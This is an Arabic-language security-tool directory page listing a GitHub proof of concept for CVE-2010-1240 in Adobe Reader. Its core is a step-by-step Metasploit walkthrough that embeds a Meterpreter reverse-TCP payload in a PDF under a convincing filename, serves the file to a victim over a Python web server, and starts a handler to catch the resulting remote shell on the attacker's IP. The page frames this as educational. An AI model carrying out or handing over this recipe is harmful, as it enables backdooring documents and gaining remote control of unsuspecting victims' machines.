Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2010-1240 — إثبات مفهوم تعليمي يوضح كيفية تضمين باب خلفي Meterpreter في ملف PDF يستغل CVE-2010-1240، مع تعليمات Metasploit خطوة بخطوة لاختبار الأمان المصرح به. | Kitploit
أدوات/GitHubGitHub/asepsaepdin/cve-2010-1240
أدوات التصيدأطر الاستغلالاستغلال تطبيقات الويباختبار الاختراقالهندسة الاجتماعيةتطوير الحمولات
GitHubasepsaepdin/cve-2010-1240

CVE-2010-1240

إثبات مفهوم تعليمي يوضح كيفية تضمين باب خلفي Meterpreter في ملف PDF يستغل CVE-2010-1240، مع تعليمات Metasploit خطوة بخطوة لاختبار الأمان المصرح به.

عرض المستودع
1161منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2010-1240 - تضمين باب خلفي في ملف PDF

Python


⚠️ لأغراض التعليم والبحث الأمني المصرح به فقط

الوصف

لا تقيّد Adobe Reader وAcrobat في الإصدارات 9.x قبل 9.3.3، و8.x قبل 8.2.3 على Windows وMac OS X محتويات أحد حقول النص في مربع حوار تحذير تشغيل الملف، مما يسهّل على المهاجمين عن بُعد خداع المستخدمين لتنفيذ برنامج محلي عشوائي تم تحديده في مستند PDF، كما يتضح من حقل نصي يدّعي أن زر "فتح" سيمكن المستخدم من قراءة رسالة مشفرة.

العرض التوضيحي

Animation

دليل الخطوات

  1. أولاً، قم بتشغيل msfconsole

    msfconsole
    
  2. ثم، عيّن الحمولة لتضمين ملف pdf

    use exploit/windows/fileformat/adobe_pdf_embedded_exe
    
  3. عيّن خيار INFILENAME وقدم المسار المباشر لملف pdf الأصلي

    set INFILENAME /home/kali/Downloads/certificate-foundations-of-threat-hunting-60c893e734422a67991e093c.pdf
    
  4. عيّن اسم ملف PDF الخبيث المنشأ حديثًا إلى اسم أكثر إقناعًا من خلال ضبط خيار FILENAME

    set FILENAME laporan.pdf
    
  5. ابحث عن الحمولة وضمّنها داخل ملف PDF

    set payload windows/meterpreter/reverse_tcp
    
  6. عيّن خيار LHOST على عنوان IP الخاص بالمهاجم

    set LHOST 172.16.10.10
    
  7. افتح طرفية جديدة وانتقل إلى موقع ملف PDF الخبيث

    cd .msf4/local/
    
  8. أنشئ خادمًا مؤقتًا باستخدام Python

    python -m http.server
    
  9. قم بتنزيل ملف PDF الخبيث على جهاز الضحية

    http://172.16.10.10:8000/certificate.pdf
    
  10. قبل تشغيل ملف PDF الخبيث على جهاز الضحية، ابدأ المستمع (listener) في الطرفية السابقة

    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set LHOST 172.16.10.10
    exploit
    
  11. بمجرد تنفيذ ملف PDF الخبيث على جهاز الضحية، سيمنحك اتصالاً بجهاز الضحية

الاعتمادات

  • https://nvd.nist.gov/vuln/detail/CVE-2010-1240
  • https://medium.com/purple-team/embedding-backdoor-into-pdf-files-1781dfce62b1
  • https://github.com/Jasmoon99/Embedded-PDF
تنزيل الأداة